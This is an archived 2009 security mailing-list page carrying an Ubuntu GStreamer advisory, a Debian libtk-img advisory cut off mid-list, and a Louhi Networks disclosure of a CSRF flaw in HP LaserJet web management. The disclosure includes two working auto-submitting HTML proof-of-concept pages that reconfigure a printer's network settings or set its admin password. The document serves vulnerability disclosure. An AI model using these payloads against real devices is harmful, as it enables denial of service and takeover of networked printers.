Vulnerability   
Search   
    Search 219043 CVE descriptions
and 99761 test descriptions,
access 10,000+ cross references.
Tests   CVE   All  

===========================================================
Ubuntu Security Notice USN-736-1             March 16, 2009
gst-plugins-good0.10 vulnerabilities
CVE-2009-0386, CVE-2009-0387, CVE-2009-0397
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 7.10:
  gstreamer0.10-plugins-good      0.10.6-0ubuntu4.2

Ubuntu 8.04 LTS:
  gstreamer0.10-plugins-good      0.10.7-3ubuntu0.2

Ubuntu 8.10:
  gstreamer0.10-plugins-good      0.10.10.4-1ubuntu1.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that GStreamer Good Plugins did not correctly handle
malformed Composition Time To Sample (ctts) atom data in Quicktime (mov)
movie files. If a user were tricked into opening a crafted mov file, an
attacker could execute arbitrary code with the privileges of the user
invoking the program. (CVE-2009-0386)

It was discovered that GStreamer Good Plugins did not correctly handle
malformed Sync Sample (aka stss) atom data in Quicktime (mov) movie files.
If a user were tricked into opening a crafted mov file, an attacker could
cause a denial of service via application crash, or possibly execute
arbitrary code with the privileges of the user invoking the program.
(CVE-2009-0387)

It was discovered that GStreamer Good Plugins did not correctly handle
malformed Time-to-sample (aka stts) atom data in Quicktime (mov) movie
files. If a user were tricked into opening a crafted mov file, an attacker
could execute arbitrary code with the privileges of the user invoking the
program. (CVE-2009-0397)


Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gst-plugins-good0.10_0.10.6-0ubuntu4.2.diff.gz
      Size/MD5:    67112 7826ecd1bd6e8a1c3b821bfaf9830624
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gst-plugins-good0.10_0.10.6-0ubuntu4.2.dsc
      Size/MD5:     1743 5f67843ea983e1cc958d9322162409ed
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gst-plugins-good0.10_0.10.6.orig.tar.gz
      Size/MD5:  2414361 8cae6351d3b5739104fbc9822eedff79

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good-doc_0.10.6-0ubuntu4.2_all.deb
      Size/MD5:   118816 11b4f7acd83c04004f5fc6a8fb72d832

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gstreamer0.10-esd_0.10.6-0ubuntu4.2_amd64.deb
      Size/MD5:    41604 993f77202e85d229aa113762fe517b37
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good-dbg_0.10.6-0ubuntu4.2_amd64.deb
      Size/MD5:  2275322 bae59a4e722193038379930052f50917
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good_0.10.6-0ubuntu4.2_amd64.deb
      Size/MD5:   887638 fda3a440fb0b7548ab52fe95b3159835

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gstreamer0.10-esd_0.10.6-0ubuntu4.2_i386.deb
      Size/MD5:    41398 49811711b54ba7aaff1544d9d20cc68d
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good-dbg_0.10.6-0ubuntu4.2_i386.deb
      Size/MD5:  2191584 e5c7b780c1ce75813b403e25f6730867
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good_0.10.6-0ubuntu4.2_i386.deb
      Size/MD5:   831526 568321670e8107f5db63d60d905dad93

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/g/gst-plugins-good0.10/gstreamer0.10-esd_0.10.6-0ubuntu4.2_lpia.deb
      Size/MD5:    41056 4fa8d02cccb01473404a7f122fdb33d3
    http://ports.ubuntu.com/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good-dbg_0.10.6-0ubuntu4.2_lpia.deb
      Size/MD5:  2281274 d06182072ee3f98ee883c1acb97cc86b
    http://ports.ubuntu.com/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good_0.10.6-0ubuntu4.2_lpia.deb
      Size/MD5:   814816 44b569bebd15909ba2aea80b6aa31397

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gstreamer0.10-esd_0.10.6-0ubuntu4.2_powerpc.deb
      Size/MD5:    42316 90c7f5f9d32ba62ee02cd5bbbb213856
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good-dbg_0.10.6-0ubuntu4.2_powerpc.deb
      Size/MD5:  2316364 7def44bedaa6c716dd2b77d9a12b42d3
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good_0.10.6-0ubuntu4.2_powerpc.deb
      Size/MD5:   940822 c3b04ca11a9cdef468b85742873f78bc

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gstreamer0.10-esd_0.10.6-0ubuntu4.2_sparc.deb
      Size/MD5:    41486 fa078f615a2364b671b1ebaa8009c0cc
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good-dbg_0.10.6-0ubuntu4.2_sparc.deb
      Size/MD5:  2159272 48974964c0240b55ef60dbdfe8b580d7
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good_0.10.6-0ubuntu4.2_sparc.deb
      Size/MD5:   869910 b01a21e97dbeff8e6f4fb50b93ac6348

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gst-plugins-good0.10_0.10.7-3ubuntu0.2.diff.gz
      Size/MD5:    27150 276829aa6bb50c88f11f24bdd733571e
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gst-plugins-good0.10_0.10.7-3ubuntu0.2.dsc
      Size/MD5:     2161 0ff7385900d3e64a1d4ae44935389ec6
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gst-plugins-good0.10_0.10.7.orig.tar.gz
      Size/MD5:  2679804 2832ded1d6be0356d77689b6ca1b5f83

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good-doc_0.10.7-3ubuntu0.2_all.deb
      Size/MD5:   150278 a5817f07555b3c1ab41b7af156799ee7

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gstreamer0.10-esd_0.10.7-3ubuntu0.2_amd64.deb
      Size/MD5:    45238 910a26a894d4506028cffd046ac8fbba
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good-dbg_0.10.7-3ubuntu0.2_amd64.deb
      Size/MD5:  2409572 33b1f10441a4201d5ae9ee4ca0761923
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good_0.10.7-3ubuntu0.2_amd64.deb
      Size/MD5:   933134 0e8674f3ce1bccf37e982e3727d94294

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gstreamer0.10-esd_0.10.7-3ubuntu0.2_i386.deb
      Size/MD5:    44902 eed5f821f251132f446a846f48304a43
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good-dbg_0.10.7-3ubuntu0.2_i386.deb
      Size/MD5:  2314362 bea2f7f92700f3f2c7fe71a1c43f0754
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good_0.10.7-3ubuntu0.2_i386.deb
      Size/MD5:   873156 27992e0787ea3aff0a0eb7f59eec5126

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/g/gst-plugins-good0.10/gstreamer0.10-esd_0.10.7-3ubuntu0.2_lpia.deb
      Size/MD5:    44736 d4b93548a750b06cc7f40960132ad110
    http://ports.ubuntu.com/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good-dbg_0.10.7-3ubuntu0.2_lpia.deb
      Size/MD5:  2344270 4778f061096af08462b9657f2cad760d
    http://ports.ubuntu.com/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good_0.10.7-3ubuntu0.2_lpia.deb
      Size/MD5:   859928 c9dd5e1f7ecfb11355df506de0b5de1b

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/g/gst-plugins-good0.10/gstreamer0.10-esd_0.10.7-3ubuntu0.2_powerpc.deb
      Size/MD5:    45866 f064d1579430aaf24d6a740d7eeeccaa
    http://ports.ubuntu.com/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good-dbg_0.10.7-3ubuntu0.2_powerpc.deb
      Size/MD5:  2441478 936594dcdcf5ef13553c9630b48d7b64
    http://ports.ubuntu.com/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good_0.10.7-3ubuntu0.2_powerpc.deb
      Size/MD5:   992084 085f21a48e8b56ebfaf14700749185b8

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/g/gst-plugins-good0.10/gstreamer0.10-esd_0.10.7-3ubuntu0.2_sparc.deb
      Size/MD5:    44946 7681084b96b4458c18554b65cf918663
    http://ports.ubuntu.com/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good-dbg_0.10.7-3ubuntu0.2_sparc.deb
      Size/MD5:  2281090 0a789144a1997411dfe30968c2ba2610
    http://ports.ubuntu.com/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good_0.10.7-3ubuntu0.2_sparc.deb
      Size/MD5:   905338 25313fb1480061615b088ad6ea04c855

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gst-plugins-good0.10_0.10.10.4-1ubuntu1.1.diff.gz
      Size/MD5:    33043 87e21ff6758d3f6ab0065c439be185b1
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gst-plugins-good0.10_0.10.10.4-1ubuntu1.1.dsc
      Size/MD5:     2761 5be1823ac44dea0836eb6c318e831abd
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gst-plugins-good0.10_0.10.10.4.orig.tar.gz
      Size/MD5:  3176916 1ed4e64beb386631a127af49a1e05946

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good-doc_0.10.10.4-1ubuntu1.1_all.deb
      Size/MD5:   189358 3a849665e603ad3bc379f5f522a182f8

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gstreamer0.10-esd_0.10.10.4-1ubuntu1.1_amd64.deb
      Size/MD5:    49132 0a5c61831d804c8526876c194a5aa747
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good-dbg_0.10.10.4-1ubuntu1.1_amd64.deb
      Size/MD5:  2972546 852117c1333bbe43abcc6eacdc2d7d94
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good_0.10.10.4-1ubuntu1.1_amd64.deb
      Size/MD5:  1096762 eee3ab4248ab3b851c32dfe8c40adcbf
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gstreamer0.10-pulseaudio_0.10.10.4-1ubuntu1.1_amd64.deb
      Size/MD5:    66856 a1f74277a76f4e4c074c4ac0c06322f7

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gstreamer0.10-esd_0.10.10.4-1ubuntu1.1_i386.deb
      Size/MD5:    48936 0030f3baa0782e03d5d100e9ca7c550a
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good-dbg_0.10.10.4-1ubuntu1.1_i386.deb
      Size/MD5:  2858450 2f4472fd8310f7f5e5898c0e41520481
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good_0.10.10.4-1ubuntu1.1_i386.deb
      Size/MD5:  1029396 96e963418d132421d589798a206565ff
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-good0.10/gstreamer0.10-pulseaudio_0.10.10.4-1ubuntu1.1_i386.deb
      Size/MD5:    64510 a1c7555097c14614724244efc325bfb9

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/g/gst-plugins-good0.10/gstreamer0.10-esd_0.10.10.4-1ubuntu1.1_lpia.deb
      Size/MD5:    48856 0ee1ac631dd62a640c58bc87d6e374e8
    http://ports.ubuntu.com/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good-dbg_0.10.10.4-1ubuntu1.1_lpia.deb
      Size/MD5:  2900804 eae5ec3f80646dffacc48301c41a20e6
    http://ports.ubuntu.com/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good_0.10.10.4-1ubuntu1.1_lpia.deb
      Size/MD5:  1016492 b7eba3f28903c0d61d0a791db9b09f1c
    http://ports.ubuntu.com/pool/main/g/gst-plugins-good0.10/gstreamer0.10-pulseaudio_0.10.10.4-1ubuntu1.1_lpia.deb
      Size/MD5:    64642 8e9c5e1c9a7a3a48b6f9a4304c84fa62

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/g/gst-plugins-good0.10/gstreamer0.10-esd_0.10.10.4-1ubuntu1.1_powerpc.deb
      Size/MD5:    50050 bfaa7fd7f36852c350a0ce1395c46c87
    http://ports.ubuntu.com/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good-dbg_0.10.10.4-1ubuntu1.1_powerpc.deb
      Size/MD5:  3014048 c868ab28d548dddc588b5de1f810b770
    http://ports.ubuntu.com/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good_0.10.10.4-1ubuntu1.1_powerpc.deb
      Size/MD5:  1167788 b5d3e32b28830db199dee7942589dcf5
    http://ports.ubuntu.com/pool/main/g/gst-plugins-good0.10/gstreamer0.10-pulseaudio_0.10.10.4-1ubuntu1.1_powerpc.deb
      Size/MD5:    66754 14c49f9422b7636307040c23e31368a5

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/g/gst-plugins-good0.10/gstreamer0.10-esd_0.10.10.4-1ubuntu1.1_sparc.deb
      Size/MD5:    48984 134c7f2faba095746763c78eacd5d842
    http://ports.ubuntu.com/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good-dbg_0.10.10.4-1ubuntu1.1_sparc.deb
      Size/MD5:  2806242 aac2251e33f78388f7c376e0c74eca24
    http://ports.ubuntu.com/pool/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good_0.10.10.4-1ubuntu1.1_sparc.deb
      Size/MD5:  1074420 0e67127b2b893080e40cbc78c147f6e9
    http://ports.ubuntu.com/pool/main/g/gst-plugins-good0.10/gstreamer0.10-pulseaudio_0.10.10.4-1ubuntu1.1_sparc.deb
      Size/MD5:    64312 b4c1837a4cfb6559a0729eeef155c57c



--=-pdOz5U4VFmdpiYT6kSG4
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAkm+uT0ACgkQLMAs/0C4zNr14ACfWKYeXVKULoZoNbYBtuaiXV5c
hTkAoKjA8YDXxbyCtLq68ACNY6WZ8KK6
>MA
-----END PGP SIGNATURE-----

--=-pdOz5U4VFmdpiYT6kSG4--

From - Tue Mar 17 12:51:15 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006a90
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39771-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id D7754ED8B9
for <lists@securityspace.com>; Tue, 17 Mar 2009 12:47:46 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 4847F143AAD; Tue, 17 Mar 2009 08:29:25 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 26632 invoked from network); 16 Mar 2009 21:05:44 -0000
Message-ID: <20090316230621.j9lw02esw00g44ck@officemail.smilehouse.com>
Date: Mon, 16 Mar 2009 23:06:21 +0200
From: Henri Lindberg <henri.lindberg@smilehouse.com>
To: bugtraq@securityfocus.com
Subject: HP Laserjet multiple models web management CSRF vulnerability &
insecure default configuration
MIME-Version: 1.0
Content-Type: text/plain;
charset=ISO-8859-1;
DelSp="Yes";
format="flowed"
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
User-Agent: Internet Messaging Program (IMP) H3 (4.2-cvs)
Status:   

                           Louhi Networks Oy
                        -= Security Advisory =-


       Advisory: HP LaserJet multiple models web management CSRF
                 vulnerability & insecure default configuration
   Release Date: 2009-03-17
  Last Modified: 2009-03-17
        Authors: Henri Lindberg, CISA
                 [henri d0t lindberg at louhi d0t fi]

    Application: HP Embedded Web Server
        Devices: HP LaserJet M1522n MFP,
                 HP Color LaserJet 2605dtn
                 possibly other HP products
   Attack type : CSRF
           Risk: Low
  Vendor Status: Issue documented in a customer notice
     References: http://www.louhinetworks.fi/advisory/HP_20090317.txt
                  
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01684566


Overview:

     Quote from http://www.hp.com:

     "Increase effectiveness and productivity with an easy-to-use
      high-performance HP MFP. HP spherical toner and an intelligent
      cartridge optimise print quality and reliability. Do more with
      fast, high-quality print, copy, scan and fax functionality.

      This affordable HP MFP delivers print, copy, scan and fax
      functionality. Hi-Speed USB 2.0 connectivity and fast,
      secure networking enable you to  easily share this device.
      Handle complex files with a 450 MHz processor and memory up to
      64 MB."


Details:

      Default configuration for the device does not require user to
      define password for configuration changes.

      Insecure out-of-the-box configuration combined with CSRF
      vulnerability in web management interface allows attacker to
      perform unwanted configuration changes through user's browser.

      Successful exploitation requires:
      1) Out-of-the-box configuration (no management password)
      2) Internal user with access to web management interface
      3) Knowledge of target printer's DNS name or IP address
      4) Ability to lure internal user to a malicious website or
         ability to inject malicious HTML/javascript to website
         frequented by said internal user.

      Simplest management interfaces contains few interesting
      features, most significant impact can be achieved with invalid
      network configuration. This results in denial-of-service
      condition, requiring manual reconfiguration in order to
      restore network connectivity.

      More advanced management interfaces based on the some software
      may contain additional features suitable for exploitation.
      It is recommended to check the features of management interface
      in order to determine the actual risk for the used product.

Mitigation:

      1) Set administrator password
      2) Do not browse untrusted sites while logged on to the
         management interface


Advisory timeline:
       2009-02-17  Contacted vendor through e-mail.
       2009-02-17  Vendor response.
       2009-03-12  Vendor decides not to patch but to release
                   a customer notice
       2009-03-17  Coordinated release of information
                   Vendor's customer notice:
                   HP Security Notice HPSN-2009-001 rev.1
                   HP LaserJet Printers, HP Edgeline Printers,
                   and HP Digital Senders - Unverified Input



Proof of Concept:

<html>
<head><title>Network</title></head>
<body onload="document.CSRF.submit();">
<FORM name="CSRF" method="post"  
ACTION="http://1.2.3.4/hp/device/config_result_YesNo.html/config";  
style="display:none">
<input name="Clear" value="Yes">
<input name="Menu" value="NetIPChange">
<input name="Configuration"  
value="IPConfig=Man&amp;IPAddr=1.1.1.1&amp;SN=2.2.2.2&amp;GW=3.3.3.3&amp;WINS=0.0.0.0">
</form>
</body>
</html>

Invalid value for "Configuration" parameter sets IP, mask and gw to  
255.255.255.255


<html>
<head><title>Set password</title></head>
<body onload="document.CSRF.submit()">
<FORM name="CSRF" method="post"  
ACTION="http://1.2.3.4/hp/device/set_config_password.html/config";  
style="display:none">
   <INPUT type="password" name="Password" MAXLENGTH="16" VALUE="evil">
   <INPUT type="password" name="ConfirmPassword" MAXLENGTH="16" VALUE="evil">
   <INPUT type="hidden" VALUE="System">
</FORM>
</body>
<html>

From - Tue Mar 17 13:11:15 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006a91
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39777-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 67BDBED93F
for <lists@securityspace.com>; Tue, 17 Mar 2009 13:02:20 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 0D1DB143D79; Tue, 17 Mar 2009 08:32:08 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 4240 invoked from network); 17 Mar 2009 08:51:43 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <white@debian.org>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-policyd-weight:  DYN_NJABL=ERR NOT_IN_SBL_XBL_SPAMHAUS=-1.5 NOT_IN_BL_NJABL=-1.5 DSBL_ORG=ERR CL_IP_EQ_HELO_MX=-3.1 (check from: .debian. - helo: .apu.snow-crash. - helo-domain: .snow-crash.)  FROM/MX_MATCHES_NOT_HELO(DOMAIN)=0 <clientx.47.227.179> <helo=apu.snow-crash.org> <from=white@debian.org> <to�bian-security-announce@lists.debian.org>, rate: -6.1
Message-Id: <20090317085205.C99698483C4@hannah.localdomain>
Date: Tue, 17 Mar 2009 19:52:05 +1100 (EST)
From: white@debian.org (Steffen Joeris)
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-9.58 tagged_above=3.6 required=5.3
tests=[BAYES_00=-2, FOURLA=0.1, FVGT_m_MULTI_ODD=0.02,
IMPRONONCABLE_1=1, IMPRONONCABLE_2=1, LDO_WHITELIST=-5,
MURPHY_WRONG_WORD1=0.1, MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1743-1] New libtk-img packages fix arbitrary code execution
Priority: urgent
Resent-Message-ID: <Zd0m5dQ8zi.A.Y0B.OT2vJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Tue, 17 Mar 2009 08:52:30 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1743-1                  security@debian.org
http://www.debian.org/security/                      Steffen Joeris
March 17, 2009                   http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : libtk-img
Vulnerability  : buffer overflows
Problem type   : local (remote)
Debian-specific: no
CVE Ids        : CVE-2007-5137 CVE-2007-5378
Debian Bug     : 519072

Two buffer overflows have been found in the GIF image parsing code of
Tk, a cross-platform graphical toolkit, which could lead to the execution
of arbitrary code. The Common Vulnerabilities and Exposures project
identifies the following problems:


CVE-2007-5137

It was discovered that libtk-img is prone to a buffer overflow via
specially crafted multi-frame interlaced GIF files.

CVE-2007-5378

It was discovered that libtk-img is prone to a buffer overflow via
specially crafted GIF files with certain subimage sizes.


For the stable distribution (lenny), these problems have been fixed in
version 1.3-release-7+lenny1.

For the oldstable distribution (etch), these problems have been fixed in
version 1.3-15etch3.

For the testing distribution (squeeze) and the unstable distribution
(sid), these problems have been fixed in version 1.3-release-8.


We recommend that you upgrade your libtk-img packages.


Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Debian (oldstable)
- ------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch3.diff.gz
    Size/MD5 checksum:   245234 735f4c10ef82cb9d871351b180ae47dc
  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3.orig.tar.gz
    Size/MD5 checksum:  3918119 ee19a7fdaaa64e9d85eeecd3b78bce8f
  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch3.dsc
    Size/MD5 checksum:      663 3a273d841105b8978f96eca6533eeefd

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch3_alpha.deb
    Size/MD5 checksum:   491110 07e4cdac4f3fba01a3b7d84648c6809d

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch3_amd64.deb
    Size/MD5 checksum:   461822 cae988f3575b2087b7d04eea38a25440

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch3_arm.deb
    Size/MD5 checksum:   436356 7ef635df0204508e8e883eb4a54ae58f

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch3_i386.deb
    Size/MD5 checksum:   430104 b00a0cb661ea599ce296796547520fe0

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch3_ia64.deb
    Size/MD5 checksum:   601608 49309def501db030330443b5bb955d38

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch3_mips.deb
    Size/MD5 checksum:   441054 026d2c2af3bed4b7f3452a7bddfaaee3

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch3_mipsel.deb
    Size/MD5 checksum:   441044 24d9bc504e550643afd51fe1f3fff1e1

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch3_powerpc.deb
    Size/MD5 checksum:   452226 3769f2ee4ac052602db18ad14e5a33d0

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch3_s390.deb
    Size/MD5 checksum:   457496 870628476aec308c566d3f4bea697730

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch3_sparc.deb
    Size/MD5 checksum:   424242 5ff1ceda5f92c0ce34398ad1a375b3ce


Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Debian (stable)
- ---------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-release-7+lenny1.diff.gz
    Size/MD5 checksum:    31608 9aa3a3da9d17f06545411973eb66cf81
  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-release.orig.tar.gz
    Size/MD5 checksum:  3969630 964a692db8a120dc5ed8779521a70bc8
  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-release-7+lenny1.dsc
    Size/MD5 checksum:     1207 83e0a72a0c54c38a38f1acc6006dd881

Architecture independent packages:

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img-doc_1.3-release-7+lenny1_all.deb
    Size/MD5 checksum:    89232 963cfc7f3b480f65d23da12086099bdb

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-release-7+lenny1_alpha.deb
    Size/MD5 checksum:   147218 3818c8a511e96717a159608ecffdcc90
  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img-dev_1.3-release-7+lenny1_alpha.deb
